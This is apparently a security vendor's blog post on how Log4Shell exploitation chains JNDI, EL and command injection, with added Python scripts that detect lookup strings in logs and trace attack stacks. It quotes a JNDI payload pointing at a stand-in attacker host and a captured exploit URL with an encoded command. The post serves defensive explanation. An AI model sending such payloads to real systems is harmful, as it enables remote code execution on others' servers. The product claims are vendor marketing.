In today's rapidly evolving cyber threat landscape, organizations face increasingly sophisticated attacks targeting their applications. Understanding these threats and the technologies designed to combat them is crucial. This article delves into the mechanics of a common application attack, using the well-known Log4Shell vulnerability as an example. Using a real-world exploit example, we explore how this vulnerability can lead to initial exploitation as well as exploit chaining, and we demonstrate how Contrast Security's Application Detection and Response (ADR) technology effectively safeguards against such zero-day threats.
The article also highlights the business benefits of ADR, including reduced risk, lower costs and improved compliance. By understanding the advantages of ADR and its real-world impact, organizations can make informed decisions to enhance their Application Security (AppSec) posture and stay ahead of emerging threats.
Before we dive into the details of ADR, it's crucial to understand how it addresses a significant gap in many organizations' security strategies: the lack of robust application-level threat detection.
Many organizations rely on WAFs as their primary defense against application-level threats. However, this approach has several critical limitations:
Technical Note: A WAF is a security tool that monitors, filters and blocks HTTP traffic to and from a web application. It operates at the network level and is intended to help protect web applications from various attacks, such as Cross-Site Scripting (XSS) and SQL injection.
Technical Note: WAF bypasses are techniques attackers use to render WAF security controls ineffective. These include methods to sneak malicious payloads past the WAF’s signature-based protections, or outright avoidance of the WAF entrypoint to the application. It is important to have a defense-in-depth strategy when it comes to AppSec and not rely on a single control to ensure security of the application layer.
EDR solutions focus on monitoring and protecting individual endpoints (like computers and mobile devices) within an organization. While crucial for overall security, EDR has its own set of limitations when it comes to AppSec:
Technical note: EDR is a cybersecurity technology that continuously monitors and responds to threats on endpoint devices such as computers, laptops and mobile devices. EDR solutions collect and analyze data from endpoints to enable security operations teams to detect, investigate and mitigate suspicious activities and potential security breaches. They typically provide real-time visibility, threat detection and automated response capabilities, focusing on endpoint-level activities rather than application-specific behaviors.
ADR technology addresses these limitations by working within the application itself. This approach offers several key advantages:
By implementing ADR, organizations can fill this critical gap in their security posture, gaining the ability to detect and respond to sophisticated application-level threats that existing solutions might miss.
Technical Note: ADR is a security approach that focuses on detecting and responding to threats at the application level. Unlike other AppSec measures that operate at the network level, ADR works within the application itself, providing deeper visibility into application behavior and more accurate threat detection.
Technical Note: A zero-day vulnerability is a software security flaw that is unknown to the software vendor and has not yet been patched. Attackers can exploit such vulnerabilities before the vendor becomes aware of them and issues a fix.
To illustrate the complexity and severity of modern application attacks, let's examine an attack against the infamous Log4Shell vulnerability (CVE-2021-44228) that sent shockwaves through the cybersecurity world in late 2021. This attack is a prime example of attack chaining, leveraging JNDI Injection, Expression Language (EL) Injection, and Command Injection.
Technical Note: The CVE program catalogs publicly disclosed computer security flaws and is maintained by MITRE. Each CVE entry has a unique identifier, making it easier for IT professionals to share information about vulnerabilities across different security tools and services.
The Log4Shell vulnerability affects Log4j, a ubiquitous Java logging framework. The attack begins when a malicious actor sends a specially crafted request to a vulnerable application. This request contains a Java Naming and Directory Interface (JNDI) lookup string in a format like this:
${jndi:ldap://attacker-controlled-server.com/payload}
Technical Note: JNDI (Java Naming and Directory Interface) is a Java API that provides naming and directory functionality to Java applications. It allows Java applications to discover and look up data and objects via a name, which can be exploited in certain vulnerabilities like Log4Shell. In this context, it's being abused to initiate a connection to a malicious server.
When the vulnerable Log4j version processes this string, it interprets the ${jndi:...} part as an expression to be evaluated. This evaluation causes the application to perform a JNDI lookup, reaching out to the attacker-controlled Lightweight Directory Access Protocol (LDAP) server specified in the string.
Technical Note: Log4j is a popular Java-based logging framework developed by Apache. It's widely used in Java applications for logging various types of data and events.
The attacker's LDAP server responds with an Expression Language (EL) injection payload. Due to the nature of JNDI and how Log4j processes the response, this payload is treated as an EL expression to be evaluated.
The EL expression typically contains malicious code designed to exploit the EL interpreter. This could include commands to download and execute additional malware, exfiltrate data or establish a backdoor in the system.
Technical Note: Expression Language (EL) is a scripting language that allows access to application data. EL injection occurs when an attacker can manipulate or inject malicious EL expressions, potentially leading to code execution. EL injection vulnerabilities are a recurring theme among zero-day vulnerabilities, either directly or indirectly through chained attacks as in this example.
As the EL interpreter evaluates the injected expression, it executes the malicious code within the context of the vulnerable application. This gives the attacker a foothold in the system, often with the same privileges as the application itself.
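As an added example (not code from the article or from Contrast), the following Python scanner finds Log4j lookup strings of the ${jndi:...} form described above in web-server log lines and breaks out the JNDI target host, port and path so a responder can triage where the lookup would have connected. The log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Constructed access-log lines (not real traffic). Line 2 carries the lookup string
# quoted in the article in its User-Agent field; line 3 adds an explicit LDAP port.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 88 "-" '
    '"${jndi:ldap://attacker-controlled-server.com/payload}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /api HTTP/1.1" 200 40 "-" '
    '"${jndi:ldap://attacker-controlled-server.com:1389/exploit}"',
]

# Body of a JNDI lookup: jndi:<scheme>://<host>[:port]/<path>
JNDI_URL = re.compile(r"jndi:\s*(?P<url>[a-z][a-z0-9+.-]*://[^\s}]+)", re.IGNORECASE)

def find_lookups(text):
    """Return every balanced ${...} span. Log4j resolves nested lookups inside-out,
    so the outermost span is the unit to report; nested braces are tracked by depth."""
    spans, depth, start, i = [], 0, None, 0
    while i < len(text):
        if text.startswith("${", i):
            if depth == 0:
                start = i
            depth, i = depth + 1, i + 2
            continue
        if text[i] == "}" and depth:
            depth -= 1
            if depth == 0:
                spans.append(text[start:i + 1])
        i += 1
    return spans

def classify_lookup(lookup):
    """Label a lookup 'jndi' (with the target broken out for triage) or 'other'."""
    m = JNDI_URL.search(lookup[2:-1])          # strip the ${ and } wrapper
    if not m:
        return {"lookup": lookup, "kind": "other"}
    u = urlsplit(m.group("url"))
    return {"lookup": lookup, "kind": "jndi", "scheme": u.scheme.lower(),
            "host": u.hostname, "port": u.port, "path": u.path}

def scan_log_lines(lines):
    """Report every lookup found, tagged with its 1-based line number."""
    return [{"line": n, **classify_lookup(lk)}
            for n, line in enumerate(lines, 1) for lk in find_lookups(line)]
```

Any ${...} lookup in request-supplied data is worth an alert on its own, since legitimate clients do not send Log4j lookup syntax; the JNDI breakdown only prioritises the finding.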
What makes the Log4Shell vulnerability particularly severe is the widespread usage of the Log4j library and how easy the vulnerability was to exploit. It raises the following concerns:
This anatomy of the Log4Shell attack demonstrates why application layer attacks are so potent and why protection mechanisms like ADR are crucial for detecting and preventing such sophisticated attacks.
With initial access established, attackers can leverage this position to use additional tactics to accomplish other objectives, such as:
The Contrast Security Runtime Security Platform employs innovative ADR technology to detect and prevent attacks like Log4Shell at multiple stages. Before we dive into the specifics of the Log4Shell protections, let’s understand the architecture that makes this possible.
Contrast ADR uses agent-based architecture, integrating directly with the application runtime:
This architecture allows Contrast Runtime Security to offer deep visibility and precise protection at multiple stages of an attack. Let's examine how this plays out in practice:
Contrast Runtime Security identifies the malicious JNDI lookup attempt by:
Contrast Runtime Security identifies EL injection attempts and protects against them by using:
In the unlikely event that malicious code is loaded, the Contrast Runtime Security Platform utilizes:
To better understand how Contrast’s ADR technology works in practice, let's examine a series of screenshots from a replicated Log4Shell attack detection event.
Note: All behavioral rules are set to MONITOR mode, not BLOCK mode, for this example to illustrate attacker exploit chaining and the defense-in-depth detection capabilities of Contrast’s ADR. Normally, these rules would be set to BLOCK mode, catching and blocking the initial JNDI exploit, and preventing the subsequent events from occurring in the first place.
In the first screenshot, we see Contrast ADR identifying a JNDI injection attempt:
ldap://143.110.184.204:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCB…
This LDAP URL is characteristic of a Log4Shell exploit attempt, where the attacker tries to initiate a JNDI lookup to a malicious server.
The second screenshot provides a detailed stack trace of the attack:
Technical Note: For those not familiar with the series of method calls shown in the screenshot above, this is a stack trace. This stack trace is a snapshot of code execution that the application was in the middle of when Contrast's ADR detected the attack. In stack traces, the method calling order is from bottom-to-top, not top-to-bottom (as we normally read), which can sometimes be confusing for non-developers. Just think of this as stacking plates on top of each other, with the most recently stacked plate going on top.
The third screenshot reveals the content of the malicious payload downloaded from the attacker-controlled server:
The fourth screenshot shows code-level details with the invocation of the EL processor:
The fifth screenshot shows the invocation of the command embedded within the JavaScript payload:
The final screenshot shows the invocation of the JavaScript code and the forking of a process via Runtime.exec, which in turn invokes ProcessBuilder.start.
Technical Note: The Nashorn scripting engine was removed from Java in version 15, which would make this specific attack payload ineffective if using a newer version of Java. However, attackers can still use other techniques to exploit this vulnerability in newer versions of Java.
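As an added example (not code from the article or from Contrast), this Python helper reads a Java stack trace the way the technical note above describes, bottom-to-top, and maps the sink frames named in the screenshots (the JNDI lookup, the EL processor, Runtime.exec and ProcessBuilder.start) back into the order the attack chain actually ran. The stack trace is constructed: the JDK, Log4j and Tomcat class names are real, the frame list is simplified, and the com.example application package is made up.

```python
import re

# Constructed Java stack trace (not the article's screenshot), printed the way the JVM
# does: most recent frame first, so it reads top-down from the process fork back to the
# HTTP request. JDK/Log4j/Tomcat class names are real; com.example is a made-up app.
SAMPLE_TRACE = """\
\tat java.lang.ProcessBuilder.start(ProcessBuilder.java)
\tat java.lang.Runtime.exec(Runtime.java)
\tat jdk.nashorn.api.scripting.NashornScriptEngine.eval(NashornScriptEngine.java)
\tat javax.el.ELProcessor.eval(ELProcessor.java)
\tat javax.naming.InitialContext.lookup(InitialContext.java)
\tat org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java)
\tat org.apache.logging.log4j.core.Logger.log(Logger.java)
\tat com.example.shop.web.LoginController.login(LoginController.java)
\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java)
\tat java.lang.Thread.run(Thread.java)
"""

FRAME = re.compile(r"^\s*at\s+(?P<cls>[\w$.]+)\.(?P<method>[\w$<>]+)\((?P<loc>[^)]*)\)")

# Frames that mark a stage of the chain the article walks through, keyed by the
# fully qualified method name.
STAGES = {
    "javax.naming.InitialContext.lookup": "jndi-lookup",
    "javax.el.ELProcessor.eval": "el-evaluation",
    "java.lang.Runtime.exec": "command-execution",
    "java.lang.ProcessBuilder.start": "process-fork",
}

def parse_frames(trace):
    """Return (class, method, location) for each 'at ...' line, top-down as printed."""
    return [m.group("cls", "method", "loc")
            for m in (FRAME.match(line) for line in trace.splitlines()) if m]

def calling_order(frames):
    """Bottom-to-top, i.e. the order in which the methods were actually called."""
    return list(reversed(frames))

def analyse_trace(trace, app_prefix):
    """Reconstruct the attack chain in call order and find the application's own
    method that handed control to the library code ending in a process fork."""
    order = calling_order(parse_frames(trace))
    names = [f"{cls}.{method}" for cls, method, _ in order]
    entry = next((n for n in names if n.startswith(app_prefix)), None)
    chain = [STAGES[n] for n in names if n in STAGES]
    return {"depth": len(order), "entry_point": entry, "chain": chain}
```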
This detailed breakdown demonstrates Contrast ADR’s ability to:
This level of insight is crucial for both preventing attacks and understanding new threat patterns.
When Contrast ADR detects a potential Log4Shell exploitation attempt, it triggers a comprehensive response that aligns with the NIST Cybersecurity Framework. Here's how an ADR system would typically respond:
Throughout this process, the ADR system:
This comprehensive ADR approach ensures a rapid, coordinated response to Log4Shell exploitation attempts, leveraging automation and integration with the broader security ecosystem to minimize risk and support quick recovery.
Technical Note: SIEM (Security Information and Event Management) is a system that collects and analyzes log data from various sources across an organization's IT infrastructure. It helps in real-time analysis of security alerts generated by applications and network hardware. Some SIEM examples include Splunk, QRadar and Microsoft Sentinel.
Technical Note: XDR (Extended Detection and Response) is a holistic security approach that collects and automatically correlates data across multiple security layers — email, endpoints, servers, cloud workloads and networks. It uses analytics to detect threats and automatically respond to them, providing a more comprehensive and efficient way to detect, investigate and respond to cybersecurity incidents across the entire IT ecosystem.
The detailed attack chain analysis provided by Contrast ADR offers several advantages:
Contrast's ADR solution offers several advantages over other security tools like web application firewalls (WAFs) and EDR products:
Implementing Contrast’s ADR technology translates into tangible business benefits:
Note: PCI DSS (Payment Card Industry Data Security Standard) is a set of security standards designed to ensure that all companies that accept, process, store or transmit credit card information maintain a secure environment.
Note: GDPR (General Data Protection Regulation) is a regulation in EU law on data protection and privacy in the European Union and the European Economic Area. It also addresses the transfer of personal data outside the EU and EEA areas.
When the Log4Shell vulnerability was disclosed, organizations worldwide scrambled to patch their systems and mitigate the risk. However, Contrast Security customers using ADR were already defended against this critical vulnerability.
Contrast ADR’s multi-layered approach to security meant that even before the vulnerability was publicly known, it could:
This proactive protection highlights the power of ADR technology in safeguarding applications against even the most sophisticated and previously unknown threats.
But Log4Shell is just one example. Other high-profile examples of zero-day protection offered by this technology include:
CVE Identifier | Application or Component | Vulnerability Type
--- | --- | ---
 | Netflix Genie | Path Traversal
 | Atlassian Confluence | Template Injection
 | Spring/Kafka | Unsafe Deserialization
 | Spring (Spring4Shell) | Malicious Data Binding
 | Atlassian Confluence | EL injection
 | Apache Struts2 | EL injection
 | Python Salt | Directory Traversal
 | Apache Tomcat | Unsafe Deserialization
 | WebLogic | Unsafe Deserialization
 | Apache Struts2 | EL injection
 | Apache Struts2 | EL injection
 | Jenkins XStream | Unsafe Deserialization
The integration of Application Detection and Response (ADR) technology with existing Security Information and Event Management (SIEM) and Extended Detection and Response (XDR) systems creates a powerful synergy that enhances overall security operations. Here's how ADR fits into and augments SIEM/XDR-driven workflows:
By integrating ADR into the SIEM/XDR ecosystem, organizations achieve more comprehensive threat detection, faster incident response, and more effective vulnerability management, significantly enhancing their overall security posture.
As cyber threats continue to evolve, network-based AppSec measures are no longer sufficient to protect critical applications and data. Contrast’s ADR technology offers a robust, intelligent, and proactive approach to AppSec.
By understanding the anatomy of modern attacks and leveraging cutting-edge ADR solutions, organizations can significantly enhance their security posture, minimize risk, and stay ahead of emerging threats. As a security decision-maker, investing in ADR technology is not just a security measure – it's a strategic imperative for safeguarding your organization's digital assets in today's threat landscape.
To learn more about how ADR technology can protect your organization:
By taking these steps, you'll be well on your way to strengthening your AppSec and staying ahead of evolving cyber threats.
Jonathan Harper is a Principal Solutions Engineer at Contrast Security with over five years of experience in Application Security. He has supported large enterprises in implementing Application Security and host-based intrusion detection systems at scale. Previously, he held roles at Threat Stack, Veracode and Micron Technology. Jonathan holds a Bachelor's degree in Electrical and Electronics Engineering from the University of Portland.